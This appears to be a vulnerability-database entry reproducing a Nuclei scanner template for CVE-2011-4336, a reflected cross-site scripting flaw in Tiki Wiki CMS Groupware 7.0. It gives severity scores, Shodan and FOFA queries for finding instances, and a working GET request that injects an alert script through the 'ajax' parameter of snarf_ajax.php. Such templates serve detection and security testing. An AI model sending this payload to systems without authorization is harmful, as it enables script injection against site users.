Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2011-4336
HistoryJul 28, 2021 - 12:13 a.m.

Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting

2021-07-2800:13:33
ProjectDiscovery
github.com

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

65.6%

Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET “ajax” parameter to snarf_ajax.php.

id: CVE-2011-4336

info:
  name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-4336
    - https://seclists.org/bugtraq/2011/Nov/140
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2011-4336
    cwe-id: CWE-79
    epss-score: 0.00255
    epss-percentile: 0.64746
    cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tiki
    product: tikiwiki_cms\/groupware
    shodan-query: http.html:"tiki wiki"
    fofa-query: body="tiki wiki"
  tags: cve,cve2011,seclists,xss,tikiwiki,tiki

http:
  - method: GET
    path:
      - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022079399ba674e01bef79750102ba44d9f07a38ab29df5b774cdcc4dabfe91f6863022100b53005cb48bf10ff0deb593fd5e876d47b6d70d7915ee69c296452f1088a5198:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

65.6%

Related for NUCLEI:CVE-2011-4336